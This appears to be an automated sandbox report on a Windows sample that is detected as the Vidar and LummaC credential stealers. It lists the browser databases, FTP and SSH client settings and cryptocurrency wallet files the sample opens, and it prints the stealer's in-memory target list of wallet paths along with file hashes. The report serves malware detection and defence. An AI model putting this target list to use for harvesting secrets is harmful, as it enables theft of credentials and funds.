Source: MSBuild.exe, 00000005.00000002.1774258553.000000000106F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000005.00000002.1774258553.000000000106F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.js	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\backups\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Yara detected Credential Stealer

Source: Yara match	File source: 00000005.00000002.1774258553.000000000106F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1773441370.0000000000503000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 6192, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: 16.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.HCFIIIJJKJ.exe.2d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.1786194225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.1788163394.00000000002FD000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY

Yara detected Vidar

Source: Yara match

File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 4.2.VmRHSCaiyc.exe.37dad8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.MSBuild.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.MSBuild.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.VmRHSCaiyc.exe.350000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.VmRHSCaiyc.exe.37dad8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.1773441370.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1448499890.000000000037D000.00000004.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: VmRHSCaiyc.exe PID: 2024, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 6192, type: MEMORYSTR

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D350D60 sqlite3_bind_parameter_name,	5_2_6D350D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D350C40 sqlite3_bind_zeroblob,	5_2_6D350C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D278EA0 sqlite3_clear_bindings,	5_2_6D278EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D350B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	5_2_6D350B40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D276410 bind,WSAGetLastError,	5_2_6D276410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D27C030 sqlite3_bind_parameter_count,	5_2_6D27C030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D276070 PR_Listen,	5_2_6D276070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D27C050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,	5_2_6D27C050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2760B0 listen,WSAGetLastError,	5_2_6D2760B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2763C0 PR_Bind,	5_2_6D2763C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2022D0 sqlite3_bind_blob,	5_2_6D2022D0

Windows Analysis Report
VmRHSCaiyc.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

ID:	1528609
Product:	CloudBasic
Start time:	04:23:10
Start date:	08.10.2024
Sample:	VmRHSCaiyc.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	1ea9e6542ab9990ae4a578c799e185ae
SHA1:	fbf88d5a63b8681e6ad99ed2352d7cb5c3b5af9d
SHA256:	3e9bcffa53eaeed8668e7908a9a85b3c2a67608f7c3a1ceba896a8a1f45add76
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Name	Type	MD5	SHA1	SHA256
C:\ProgramData\HCFIIIJJKJ.exe	PE32 executable (GUI) Intel 80386, for MS Windows	DFA10532BCDD904057A84674E90A5792	267E66D81DB36AE2CD5557F291D1EDBBD2E3B6C6	CA03B8D8929A2C6A1E94663B3B45A1D46B6E5002F13858C8DC05A83D5B11C607
C:\ProgramData\KKEHIEBKJKFI\BKEBFH	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7	CFFF4E2B77FC5A18AB6323AF9BF95339	3AA2C2115A8EB4516049600E8832E9BFFE0C2412	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
C:\ProgramData\KKEHIEBKJKFI\BKJEGD	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3	369B6DD66F1CAD49D0952C40FEB9AD41	D05B2DE29433FB113EC4C558FF33087ED7481DD4	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
C:\ProgramData\KKEHIEBKJKFI\BKJEGD-shm	data	B7C14EC6110FA820CA6B65F5AEC85911	608EEB7488042453C9CA40F7E1398FC1A270F3F4	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
C:\ProgramData\KKEHIEBKJKFI\CFHIIE	ASCII text, with very long lines (1769), with CRLF line terminators	7E44458E0A8A3A7D10875BC3B7AE72D1	E5E6AC8676EE3761DAB13A10EB7573C19F48D297	21A04E176A9CEBDA60AE6FD82A7495C6E0867ED02B8009A44DDC9863E14D8753
C:\ProgramData\KKEHIEBKJKFI\CGIDGC	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7	9A809AD8B1FDDA60760BB6253358A1DB	D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66	95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
C:\ProgramData\KKEHIEBKJKFI\DGIJEG	SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 5	9664DAA86F8917816B588C715D97BE07	FAD9771763CD861ED8F3A57004C4B371422B7761	8FED359D88F0588829BA60D236269B2528742F7F66DF3ACF22B32B8F883FE785
C:\ProgramData\KKEHIEBKJKFI\ECGIII	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1	9E68EA772705B5EC0C83C2A97BB26324	243128040256A9112CEAC269D56AD6B21061FF80	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
C:\ProgramData\KKEHIEBKJKFI\GIIEGH	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3	2D903A087A0C793BDB82F6426B1E8EFB	E7872CC094C598B104DA25AC6C8BEB82DAB3F08F	AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
C:\ProgramData\KKEHIEBKJKFI\HCBAKJ	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2	4BB4A37B8E93E9B0F5D3DF275799D45E	E27DF7CC49B0D145140C119A99C1BBAA9ECCE8F7	89BC0F21671C244C40A9EA42893B508858AD6E1E26AC16F2BD507C3E8CBB3CF7
C:\ProgramData\KKEHIEBKJKFI\HCBAKJ-shm	data	B7C14EC6110FA820CA6B65F5AEC85911	608EEB7488042453C9CA40F7E1398FC1A270F3F4	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
C:\ProgramData\KKEHIEBKJKFI\IEHCBA	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1	7B955D976803304F2C0505431A0CF1CF	E29070081B18DA0EF9D98D4389091962E3D37216	987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_HCFIIIJJKJ.exe_f8dfa5a719fed910ad33ae7cc23e922599ff1f20_ada4b898_413a2da4-0e1b-4907-bd30-06134651640e\Report.wer	Unicode text, UTF-16, little-endian text, with CRLF line terminators	0527D48945E5B0EE9D7DF272164D56CD	A44D8B8CD196E4653A485FFCF3AE31472E6626B8	B2A03BF5BEB4442B32C0CA1170AC3D5F5FEAB97687085EB87FC391C47AF85C37
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_VmRHSCaiyc.exe_8fc1908717c28f1c650eb89c468b956b22f36f_31dae590_67c9ef2a-baa0-437a-846d-22cc109bc30d\Report.wer	Unicode text, UTF-16, little-endian text, with CRLF line terminators	47668A5D540A0B74C104E6A14FE8AC02	69EBAE2B13BA1C1D2988D57F232E3021A699221F	19BBFAA3FE68D6BF7F01FC6B60F20B59596F5B48BE4811CE51D2EB66D078701B
C:\ProgramData\Microsoft\Windows\WER\Temp\WER4127.tmp.dmp	Mini DuMP crash report, 14 streams, Tue Oct 8 02:24:08 2024, 0x1205a4 type	64D64AEE9E79DB8F330923A3FA264A0E	F688EADE72C8892055CF945261D7F98FC95F66CA	2B9BD47D83870C6C1370B6AE9DA8150146C077FA96F6148322618F071FDD9C83
C:\ProgramData\Microsoft\Windows\WER\Temp\WER41C4.tmp.WERInternalMetadata.xml	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	F311E6E0BAED1406A7B06263B2835228	67E5CAEEF45567707B71DEC76095D563059BEF59	F7119FD6AA8B1F6BE6AB2F698AEBD541F38A29389266B8D46E9C4DC38408D15A
C:\ProgramData\Microsoft\Windows\WER\Temp\WER4204.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	DB3F8CC341DA1AD20F178A18E635668C	6BED97500E3B1A8D34F743D7392EABB3C7B87F55	3E40C777EF4170BEB0337AF42F8EF49E03F468F69B532789906B20C24FB5D373
C:\ProgramData\Microsoft\Windows\WER\Temp\WERF8EE.tmp.dmp	Mini DuMP crash report, 14 streams, Tue Oct 8 04:19:56 2024, 0x1205a4 type	A806FEAD1A40E102BB974FA3E5A0B4F6	4E00CA8B8D6FC2A0157927EC9C25C3B6CD6E564F	DD95DE3C46702AFDB32AD54DC0DDD3ADDB9036CDCBC7673C0E66983152367908
C:\ProgramData\Microsoft\Windows\WER\Temp\WERF9C9.tmp.WERInternalMetadata.xml	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	2DFFADEE7CDF5EF9EE8BFBC41361BA44	B8FFF66E2BC6DD98E4632954EF3C62C3EE82D2D3	FF10B6FF9838FF5C8CB015E2C9E0B7A894F8FDA67CDA3D79C7262F5D223EC7BB
C:\ProgramData\Microsoft\Windows\WER\Temp\WERF9F9.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	F22E2A68960AC69DDE5660320A9EDB82	669AD018EA44579CC5092BB1175FA441A2BBA40E	A39BFCB6898B5F800BF0050FDF869EEDEEFB1F354946E325DF381A55C8956C93
C:\ProgramData\freebl3.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	550686C0EE48C386DFCB40199BD076AC	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
C:\ProgramData\mozglue.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	C8FD9BE83BC728CC04BEFFAFC2907FE9	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
C:\ProgramData\msvcp140.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	5FF1FCA37C466D6723EC67BE93B51442	34CC4E158092083B13D67D6D2BC9E57B798A303B	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
C:\ProgramData\nss3.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	1CC453CDF74F31E4D913FF9C10ACDDE2	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
C:\ProgramData\softokn3.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	4E52D739C324DB8225BD9AB2695F262F	71C3DA43DC5A0D2A1941E874A6D015A071783889	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
C:\ProgramData\vcruntime140.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	A37EE36B536409056A86F50E67777DD7	1CAFA159292AA736FC595FC04E16325B27CD6750	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\mozglue[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	C8FD9BE83BC728CC04BEFFAFC2907FE9	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\nss3[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	1CC453CDF74F31E4D913FF9C10ACDDE2	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\a43486128347[1].exe	PE32 executable (GUI) Intel 80386, for MS Windows	DFA10532BCDD904057A84674E90A5792	267E66D81DB36AE2CD5557F291D1EDBBD2E3B6C6	CA03B8D8929A2C6A1E94663B3B45A1D46B6E5002F13858C8DC05A83D5B11C607
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\msvcp140[1].dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	5FF1FCA37C466D6723EC67BE93B51442	34CC4E158092083B13D67D6D2BC9E57B798A303B	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\freebl3[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	550686C0EE48C386DFCB40199BD076AC	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\vcruntime140[1].dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	A37EE36B536409056A86F50E67777DD7	1CAFA159292AA736FC595FC04E16325B27CD6750	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\softokn3[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	4E52D739C324DB8225BD9AB2695F262F	71C3DA43DC5A0D2A1941E874A6D015A071783889	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\sql[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	90E744829865D57082A7F452EDC90DE5	833B178775F39675FA4E55EAB1032353514E1052	036A57102385D7F0D7B2DEACF932C1C372AE30D924365B7A88F8A26657DD7550
C:\Users\user\AppData\Local\Temp\delays.tmp	ASCII text, with very long lines (65536), with no line terminators	15BF1C7A6626BDCB08FE645E21480A1C	49CA50678217A2815249E474E69D7B5626711424	2CFF651EC29DD8ED1986BB4E962CADE3FA060809A880319CEB81CDC4ED6052A3
C:\Windows\appcompat\Programs\Amcache.hve	MS Windows registry file, NT/2000 or above	ED4F2E5D3A6AD6A8D36DEE5DCDBCB1FC	F9A13B7C7D5250039CC9891A862CA0AB45B6A78B	0F5E26EB9ECE32905A2F1E061A5138927789A25209E39B8B06CCBA3F4D836DDF

Windows Analysis Report VmRHSCaiyc.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
VmRHSCaiyc.exe

Malware Threat Intel
Provided by